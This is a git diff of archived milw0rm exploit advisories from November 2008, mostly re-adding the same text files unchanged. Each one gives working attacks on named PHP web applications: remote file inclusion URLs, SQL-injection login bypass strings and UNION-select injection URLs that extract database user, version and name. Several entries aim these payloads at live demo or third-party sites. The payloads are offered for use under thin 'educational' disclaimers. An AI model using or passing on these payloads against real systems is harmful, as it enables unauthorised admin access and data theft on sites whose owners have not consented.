+        require_once($GLOBALS['mosConfig_absolute_path'] . '/components/com_competitions/lib/common/GlobalVariables.class.php');
+
+       administrator/components/com_competitions/includes/competitions/competitions.php
+
+        require_once( $GLOBALS['mosConfig_absolute_path'] . '/administrator/includes/pageNavigation.php' );
+
+       administrator/components/com_competitions/includes/settings/settings.php
+
+        require_once($mosConfig_absolute_path.'/components/com_competitions/lib/common/String.class.php');
+
+
+
+  [o] Exploit
+
+       http://localhost/[path]/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
+       http://localhost/[path]/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
+       http://localhost/[path]/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=[evilcode]
+
+
+=============================================================================================================================================================
+
+
+  [o] Greetz
+
+       MainHack BrotherHood [ http://serverisdown.org/blog/]
+       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
+       H312Y yooogy mousekill }^-^{ kaka11  martfella
+       skulmatic olibekas ulga Cungkee k1tk4t str0ke
+
+        
+=============================================================================================================================================================
+
+# milw0rm.com [2008-11-07]
diff --git a/platforms/php/webapps/7040.txt b/platforms/php/webapps/7040.txt
index dd1bf8153..9a21d2bbb 100755
--- a/platforms/php/webapps/7040.txt
+++ b/platforms/php/webapps/7040.txt
@@ -1,58 +1,58 @@
-===================================================================================================================================================
-
-
-  [o] Feederator - RSS manager Component 1.0.5 Multiple Remote File Inclusion Vulnerabilities
-
-       Software : com_feederator version 1.0.5
-       Vendor   : http://www.recly.com/
-       Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=2
-       Author   : NoGe
-       Contact  : noge[dot]code[at]gmail[dot]com
-       Blog     : http://evilc0de.blogspot.com
-
-
-===================================================================================================================================================
-
-
-  [o] Vulnerable file
-
-       administrator/components/com_feederator/includes/tmsp/add_tmsp.php
-
-        require_once( $mosConfig_absolute_path . '/components/Recly/Recly_TMSP/Recly_TMSP.class.php' );
-
-       administrator/components/com_feederator/includes/tmsp/edit_tmsp.php
-
-        require_once( $mosConfig_absolute_path . '/components/Recly/Recly_TMSP/Recly_TMSP.class.php' );
-
-       administrator/components/com_feederator/includes/tmsp/subscription.php
-
-        require_once($GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/GlobalVariables.class.php');
-
-       administrator/components/com_feederator/includes/tmsp/tmsp.php
-
-        require_once( $mosConfig_absolute_path . '/components/Recly/Recly_HTML/Recly_Paginator.class.php' );
-
-
-
-  [o] Exploit
-
-       http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=[evilcode]
-       http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=[evilcode]
-       http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
-       http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=[evilcode]
-
-
-===================================================================================================================================================
-
-
-  [o] Greetz
-
-       MainHack BrotherHood [ http://serverisdown.org/blog/]
-       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
-       H312Y yooogy mousekill }^-^{ kaka11  martfella
-       skulmatic olibekas ulga Cungkee k1tk4t str0ke
-
-        
-===================================================================================================================================================
-
-# milw0rm.com [2008-11-07]
+===================================================================================================================================================
+
+
+  [o] Feederator - RSS manager Component 1.0.5 Multiple Remote File Inclusion Vulnerabilities
+
+       Software : com_feederator version 1.0.5
+       Vendor   : http://www.recly.com/
+       Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=2
+       Author   : NoGe
+       Contact  : noge[dot]code[at]gmail[dot]com
+       Blog     : http://evilc0de.blogspot.com
+
+
+===================================================================================================================================================
+
+
+  [o] Vulnerable file
+
+       administrator/components/com_feederator/includes/tmsp/add_tmsp.php
+
+        require_once( $mosConfig_absolute_path . '/components/Recly/Recly_TMSP/Recly_TMSP.class.php' );
+
+       administrator/components/com_feederator/includes/tmsp/edit_tmsp.php
+
+        require_once( $mosConfig_absolute_path . '/components/Recly/Recly_TMSP/Recly_TMSP.class.php' );
+
+       administrator/components/com_feederator/includes/tmsp/subscription.php
+
+        require_once($GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/GlobalVariables.class.php');
+
+       administrator/components/com_feederator/includes/tmsp/tmsp.php
+
+        require_once( $mosConfig_absolute_path . '/components/Recly/Recly_HTML/Recly_Paginator.class.php' );
+
+
+
+  [o] Exploit
+
+       http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=[evilcode]
+       http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=[evilcode]
+       http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
+       http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=[evilcode]
+
+
+===================================================================================================================================================
+
+
+  [o] Greetz
+
+       MainHack BrotherHood [ http://serverisdown.org/blog/]
+       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
+       H312Y yooogy mousekill }^-^{ kaka11  martfella
+       skulmatic olibekas ulga Cungkee k1tk4t str0ke
+
+        
+===================================================================================================================================================
+
+# milw0rm.com [2008-11-07]
diff --git a/platforms/php/webapps/7041.txt b/platforms/php/webapps/7041.txt
index ab2e25029..320e9f508 100755
--- a/platforms/php/webapps/7041.txt
+++ b/platforms/php/webapps/7041.txt
@@ -1,29 +1,29 @@
-E-topbiz Online Store 1 (Auth Bypass) SQL Injection Vulnerability
-
-author: ZoRLu  msn: trt-turk@hotmail.com
-
-Home: www.z0rlu.blogspot.com
-
-N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : (   ( bIktIm a.q )
-
-Exploit:
-
-username: [real_admin_name] ' or ' 1=1
-
-password: ZoRLu
-
-note: generally admin name: admin 
-
-
-for demo: 
-
-http://e-topbiz.com/trafficdemos/store1/admin/login.php
-
-username: admin ' or ' 1=1--
-
-password: ZoRLu
-
-
-thanks: str0ke & yildirimordulari.org  &  darkc0de.com
-
-# milw0rm.com [2008-11-07]
+E-topbiz Online Store 1 (Auth Bypass) SQL Injection Vulnerability
+
+author: ZoRLu  msn: trt-turk@hotmail.com
+
+Home: www.z0rlu.blogspot.com
+
+N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : (   ( bIktIm a.q )
+
+Exploit:
+
+username: [real_admin_name] ' or ' 1=1
+
+password: ZoRLu
+
+note: generally admin name: admin 
+
+
+for demo: 
+
+http://e-topbiz.com/trafficdemos/store1/admin/login.php
+
+username: admin ' or ' 1=1--
+
+password: ZoRLu
+
+
+thanks: str0ke & yildirimordulari.org  &  darkc0de.com
+
+# milw0rm.com [2008-11-07]
diff --git a/platforms/php/webapps/7042.txt b/platforms/php/webapps/7042.txt
index 4e4613613..6bbd41861 100755
--- a/platforms/php/webapps/7042.txt
+++ b/platforms/php/webapps/7042.txt
@@ -1,57 +1,57 @@
-################################################################ 
-#       .___             __          _______       .___        # 
-#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
-#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
-#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
-#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
-#        \/                  \/             \/                 # 
-#                   ___________   ______  _  __                # 
-#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
-#                 \  \___|  | \/\  ___/\     /                 # 
-#                  \___  >__|    \___  >\/\_/                  # 
-#      est.2007        \/            \/   forum.darkc0de.com   # 
-################################################################ 
-# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
-#- Nik-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz           #
-#        and all darkc0de and DarkTrix members               --# 
-################################################################ 
-# 
-# Author: r45c4l 
-# 
-# Home  : www.darkc0de.com & darktrix.info
-# 
-# Email : r45c4l@hotmail.com 
-# 
-# Share the c0de! 
-# 
-################################################################ 
-# 
-# Title: Pre Car Lister (Auth Bypass) SQl Injection Vulnerability
-# 
-# 
-###########################################################
-#
-# Script Vendor: http://www.preproject.com/projectDetail.asp?projectID=226
-#
-###########################################################
- 
-     Go To Admin Panel :
-
-       Login With this information :
-
-	Admin : anything' OR 'x'='x
-
-	pass  : anything' OR 'x'='x
-
-
-    Live Demo : 
-
-	http://www.preproject.com/abc/carlister/adminlogin.php
-
-
-###########################################################
-#
-#  Bug discovered : 06 Nov 2008
-###########################################################
-
-# milw0rm.com [2008-11-07]
+################################################################ 
+#       .___             __          _______       .___        # 
+#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
+#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
+#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
+#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
+#        \/                  \/             \/                 # 
+#                   ___________   ______  _  __                # 
+#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
+#                 \  \___|  | \/\  ___/\     /                 # 
+#                  \___  >__|    \___  >\/\_/                  # 
+#      est.2007        \/            \/   forum.darkc0de.com   # 
+################################################################ 
+# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
+#- Nik-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz           #
+#        and all darkc0de and DarkTrix members               --# 
+################################################################ 
+# 
+# Author: r45c4l 
+# 
+# Home  : www.darkc0de.com & darktrix.info
+# 
+# Email : r45c4l@hotmail.com 
+# 
+# Share the c0de! 
+# 
+################################################################ 
+# 
+# Title: Pre Car Lister (Auth Bypass) SQl Injection Vulnerability
+# 
+# 
+###########################################################
+#
+# Script Vendor: http://www.preproject.com/projectDetail.asp?projectID=226
+#
+###########################################################
+ 
+     Go To Admin Panel :
+
+       Login With this information :
+
+	Admin : anything' OR 'x'='x
+
+	pass  : anything' OR 'x'='x
+
+
+    Live Demo : 
+
+	http://www.preproject.com/abc/carlister/adminlogin.php
+
+
+###########################################################
+#
+#  Bug discovered : 06 Nov 2008
+###########################################################
+
+# milw0rm.com [2008-11-07]
diff --git a/platforms/php/webapps/7043.txt b/platforms/php/webapps/7043.txt
index ad55039f7..989095567 100755
--- a/platforms/php/webapps/7043.txt
+++ b/platforms/php/webapps/7043.txt
@@ -1,67 +1,67 @@
-***********************************************************************************************************************************************************        
-[!]                                                                                                                                                     [!]
-[!]                                  OOOO             O                                 OOOOOOOOO                                                       [!]
-[!]                                 O    O            O                                 O      O                                                        [!]
-[!]                                 O                 O                                       O                                                         [!]
-[!]                                 O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO                               [!]
-[!]                                 O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O                              [!]
-[!]                                 O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO                              [!]
-[!]                                 O    O    OOOO    O     O   O         O               O      O O    O   O   O   O                                   [!]
-[!]                                  OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO                               [!]
-[!]                                           OO                                                                                                        [!]
-[!]                                          OO                                                                                                         [!]
-[!]                                         OO                          Proud To Be MoroCCaN                                                            [!]
-[!]                                        OO                                                                                                           [!]
-***********************************************************************************************************************************************************
- +----                                                       Bismi Allah Irahmani ArraHim                                                             ----+
-++--------------------------------------------------------------------------------------------------------------------------------------------------------+
-++                                       [    Mole Group Rental Script(Auth Bypass) SQL Injection Vulnerability ]                                          ++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-:   Author   : Cyber-Zone   ( Abdelkhalek)                                                                :       :                                       :
-¦   E-MaiL   : Paradis_des_fous[at]hotmail[dot]fr                                                         ¦       ¦                                       ¦
-¦   Home     : WwW.IQ-Ty.CoM                                                                              ¦       ¦         MySQL Version Is :            ¦
-¦   From     : MoroCCo                                                                                    ¦       ¦                                       ¦
-¦   Script   : http://www.mole-group.com                                                                  ¦       ¦                ![ ]!                  ¦
-¦   Download : http://www.mole-group.com/content/view/32/46/                                              ¦       ¦                                       ¦
-¦   RisK     : High [¦¦¦¦¦¦¦¦]                                                                            ¦       ¦                                       ¦
-¦ --------------------------------------------------------------------------------------------------------+       +-------------------------------------- ¦
-¦                                                          From The Dark Side Of MoroCCo                                                                 ++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-:                                                                                                                                                         :
-¦  Remember    :                                                                                                                                          ¦
-¦  -------------                                                                                                                                          ¦
-¦                                                                                                                                                         ¦
-¦  This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages.                                             ¦
-¦                                                                                                                                                         ¦
-
-++--------------------------------------------------------------------------------------------------------------------------------------------------------+
-++        [!]  Fi khater Ga3 Li TkarfasT 3liHom , Wali SabbiThom F IndeX Dyali , NabGhi NgoliHom : Rakom MaChafto WaLo , Wal9adimo Al3an  [!]            ++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-
-
-Bypass : ........
-
-Go To The Admin Panel.
-and Login with this information :
-
-username : admin ' or ' 1=1
-password : Cyber-Zone or any thing you want :)
-
-yeah bro you  loged in dont worry :)
-
-and this is a live demo :
-http://rent.mole-group.com/admin/login.php?in_login=yes&retpage=%2Fadmin%2Findex.php
-
-EnjoY.
-
-
-
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-+----                                                                  ThanX To                                                                       ----+
-++--------------------------------------------------------------------------------------------------------------------------------------------------------+
-++[  $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-=                                                                    [AttaCk Is CompLet]                                                                  =
-___________________________________________________________________________________________________________________________________________________________
-
-# milw0rm.com [2008-11-07]
+***********************************************************************************************************************************************************        
+[!]                                                                                                                                                     [!]
+[!]                                  OOOO             O                                 OOOOOOOOO                                                       [!]
+[!]                                 O    O            O                                 O      O                                                        [!]
+[!]                                 O                 O                                       O                                                         [!]
+[!]                                 O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO                               [!]
+[!]                                 O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O                              [!]
+[!]                                 O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO                              [!]
+[!]                                 O    O    OOOO    O     O   O         O               O      O O    O   O   O   O                                   [!]
+[!]                                  OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO                               [!]
+[!]                                           OO                                                                                                        [!]
+[!]                                          OO                                                                                                         [!]
+[!]                                         OO                          Proud To Be MoroCCaN                                                            [!]
+[!]                                        OO                                                                                                           [!]
+***********************************************************************************************************************************************************
+ +----                                                       Bismi Allah Irahmani ArraHim                                                             ----+
+++--------------------------------------------------------------------------------------------------------------------------------------------------------+
+++                                       [    Mole Group Rental Script(Auth Bypass) SQL Injection Vulnerability ]                                          ++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+:   Author   : Cyber-Zone   ( Abdelkhalek)                                                                :       :                                       :
+¦   E-MaiL   : Paradis_des_fous[at]hotmail[dot]fr                                                         ¦       ¦                                       ¦
+¦   Home     : WwW.IQ-Ty.CoM                                                                              ¦       ¦         MySQL Version Is :            ¦
+¦   From     : MoroCCo                                                                                    ¦       ¦                                       ¦
+¦   Script   : http://www.mole-group.com                                                                  ¦       ¦                ![ ]!                  ¦
+¦   Download : http://www.mole-group.com/content/view/32/46/                                              ¦       ¦                                       ¦
+¦   RisK     : High [¦¦¦¦¦¦¦¦]                                                                            ¦       ¦                                       ¦
+¦ --------------------------------------------------------------------------------------------------------+       +-------------------------------------- ¦
+¦                                                          From The Dark Side Of MoroCCo                                                                 ++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+:                                                                                                                                                         :
+¦  Remember    :                                                                                                                                          ¦
+¦  -------------                                                                                                                                          ¦
+¦                                                                                                                                                         ¦
+¦  This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages.                                             ¦
+¦                                                                                                                                                         ¦
+
+++--------------------------------------------------------------------------------------------------------------------------------------------------------+
+++        [!]  Fi khater Ga3 Li TkarfasT 3liHom , Wali SabbiThom F IndeX Dyali , NabGhi NgoliHom : Rakom MaChafto WaLo , Wal9adimo Al3an  [!]            ++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+
+
+Bypass : ........
+
+Go To The Admin Panel.
+and Login with this information :
+
+username : admin ' or ' 1=1
+password : Cyber-Zone or any thing you want :)
+
+yeah bro you  loged in dont worry :)
+
+and this is a live demo :
+http://rent.mole-group.com/admin/login.php?in_login=yes&retpage=%2Fadmin%2Findex.php
+
+EnjoY.
+
+
+
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
++----                                                                  ThanX To                                                                       ----+
+++--------------------------------------------------------------------------------------------------------------------------------------------------------+
+++[  $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+=                                                                    [AttaCk Is CompLet]                                                                  =
+___________________________________________________________________________________________________________________________________________________________
+
+# milw0rm.com [2008-11-07]
diff --git a/platforms/php/webapps/7044.txt b/platforms/php/webapps/7044.txt
index ddc42fd0b..09014a609 100755
--- a/platforms/php/webapps/7044.txt
+++ b/platforms/php/webapps/7044.txt
@@ -1,45 +1,45 @@
-[~] MyioSoft Ajax Portal 3.0 Remote Auth Bypass Vulnerability
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 07.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] dork: "Powered by Ajax Portal 3.0"
-[~]
-[~] -----------------------------------------------------------
-
-Exploit:
-
-username: [real_admin_name] ' or ' 1=1  ( you must know admin_name )
-
-password: ZoRLu
-
-note: generally admin name: admin
-
-
-admin login for demo:
-
-http://myiosoft.com/products/AjaxPortal/demo/
-
-
-example for demo:
-
-admin: demo1 ' or ' 1=1
-
-passwd: ZoRLu
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-07]
+[~] MyioSoft Ajax Portal 3.0 Remote Auth Bypass Vulnerability
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 07.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] dork: "Powered by Ajax Portal 3.0"
+[~]
+[~] -----------------------------------------------------------
+
+Exploit:
+
+username: [real_admin_name] ' or ' 1=1  ( you must know admin_name )
+
+password: ZoRLu
+
+note: generally admin name: admin
+
+
+admin login for demo:
+
+http://myiosoft.com/products/AjaxPortal/demo/
+
+
+example for demo:
+
+admin: demo1 ' or ' 1=1
+
+passwd: ZoRLu
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-07]
diff --git a/platforms/php/webapps/7045.txt b/platforms/php/webapps/7045.txt
index 249ef39fd..31b3842df 100755
--- a/platforms/php/webapps/7045.txt
+++ b/platforms/php/webapps/7045.txt
@@ -1,43 +1,43 @@
-[~] MyioSoft EasyBookMarker Remote Auth Bypass Vulnerability
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 07.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] -----------------------------------------------------------
-
-Exploit:
-
-username: [real_admin_name] ' or ' 1=1  ( you must know admin_name )
-
-password: ZoRLu
-
-note: generally admin name: admin
-
-
-admin login for demo:
-
-http://myiosoft.com/products/EasyBookMarker/demo/
-
-
-example for demo:
-
-admin: demo1 ' or ' 1=1
-
-passwd: ZoRLu
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-07]
+[~] MyioSoft EasyBookMarker Remote Auth Bypass Vulnerability
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 07.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] -----------------------------------------------------------
+
+Exploit:
+
+username: [real_admin_name] ' or ' 1=1  ( you must know admin_name )
+
+password: ZoRLu
+
+note: generally admin name: admin
+
+
+admin login for demo:
+
+http://myiosoft.com/products/EasyBookMarker/demo/
+
+
+example for demo:
+
+admin: demo1 ' or ' 1=1
+
+passwd: ZoRLu
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-07]
diff --git a/platforms/php/webapps/7046.txt b/platforms/php/webapps/7046.txt
index 6edffe069..c5957034f 100755
--- a/platforms/php/webapps/7046.txt
+++ b/platforms/php/webapps/7046.txt
@@ -1,43 +1,43 @@
-[~] MyioSoft EasyCalendar Remote Auth Bypass Vulnerability
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 07.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] -----------------------------------------------------------
-
-Exploit:
-
-username: [real_admin_name] ' or ' 1=1  ( you must know admin_name )
-
-password: ZoRLu
-
-note: generally admin name: admin
-
-
-admin login for demo:
-
-http://myiosoft.com/products/EasyCalendar/demo/
-
-
-example for demo:
-
-admin: demo1 ' or ' 1=1
-
-passwd: ZoRLu
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-07]
+[~] MyioSoft EasyCalendar Remote Auth Bypass Vulnerability
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 07.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] -----------------------------------------------------------
+
+Exploit:
+
+username: [real_admin_name] ' or ' 1=1  ( you must know admin_name )
+
+password: ZoRLu
+
+note: generally admin name: admin
+
+
+admin login for demo:
+
+http://myiosoft.com/products/EasyCalendar/demo/
+
+
+example for demo:
+
+admin: demo1 ' or ' 1=1
+
+passwd: ZoRLu
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-07]
diff --git a/platforms/php/webapps/7047.txt b/platforms/php/webapps/7047.txt
index b848067c5..c26138950 100755
--- a/platforms/php/webapps/7047.txt
+++ b/platforms/php/webapps/7047.txt
@@ -1,41 +1,41 @@
-[~] deltascripts phpclassifieds Remote Sql inj.
-[~]
-[~] detail.php (siteid) 
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 06.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] -----------------------------------------------------------
-
-Exploit:
-
-http://localhost/script_path/detail.php?siteid=[SQL]
-
-[SQL]=
-
--99999999+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from+user/*
-
-live sites:
-
-http://www.deltascripts.com/phpclassifieds/livesites
-
-for example:
-
-http://www.saabcentral.com/classifieds/detail.php?siteid=-99999999+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from+user/*
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-07]
+[~] deltascripts phpclassifieds Remote Sql inj.
+[~]
+[~] detail.php (siteid) 
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 06.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] -----------------------------------------------------------
+
+Exploit:
+
+http://localhost/script_path/detail.php?siteid=[SQL]
+
+[SQL]=
+
+-99999999+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from+user/*
+
+live sites:
+
+http://www.deltascripts.com/phpclassifieds/livesites
+
+for example:
+
+http://www.saabcentral.com/classifieds/detail.php?siteid=-99999999+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from+user/*
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-07]
diff --git a/platforms/php/webapps/7048.txt b/platforms/php/webapps/7048.txt
index d8a83461f..ca58da451 100755
--- a/platforms/php/webapps/7048.txt
+++ b/platforms/php/webapps/7048.txt
@@ -1,14 +1,14 @@
-> > =================================================================
-> > ======== E-topbiz Online Store 1 Remote File Sql Injection ======
-> > =================================================================
-> > home of script : http://e-topbiz.com/
-> > By: Stack
-> > ====Vulnerable Demo and Exploit ====
-> >
-> > PoC URL :
-> > http://site.il/path/index.php?cat_id=-1%20unION/**/SELECT/**/concat_ws(0x3a,user(),database()),2,3,4,5,6/*
-> >
-> > Demo URL :
-> > http://e-topbiz.com/trafficdemos/store1/index.php?cat_id=-1%20unION/**/SELECT/**/concat_ws(0x3a,user(),database()),2,3,4,5,6/*
-
-# milw0rm.com [2008-11-07]
+> > =================================================================
+> > ======== E-topbiz Online Store 1 Remote File Sql Injection ======
+> > =================================================================
+> > home of script : http://e-topbiz.com/
+> > By: Stack
+> > ====Vulnerable Demo and Exploit ====
+> >
+> > PoC URL :
+> > http://site.il/path/index.php?cat_id=-1%20unION/**/SELECT/**/concat_ws(0x3a,user(),database()),2,3,4,5,6/*
+> >
+> > Demo URL :
+> > http://e-topbiz.com/trafficdemos/store1/index.php?cat_id=-1%20unION/**/SELECT/**/concat_ws(0x3a,user(),database()),2,3,4,5,6/*
+
+# milw0rm.com [2008-11-07]
diff --git a/platforms/php/webapps/7049.txt b/platforms/php/webapps/7049.txt
index 77a73ec2f..4e08189e9 100755
--- a/platforms/php/webapps/7049.txt
+++ b/platforms/php/webapps/7049.txt
@@ -1,33 +1,33 @@
-************************(XSS / FD Vulnerability)**************
-
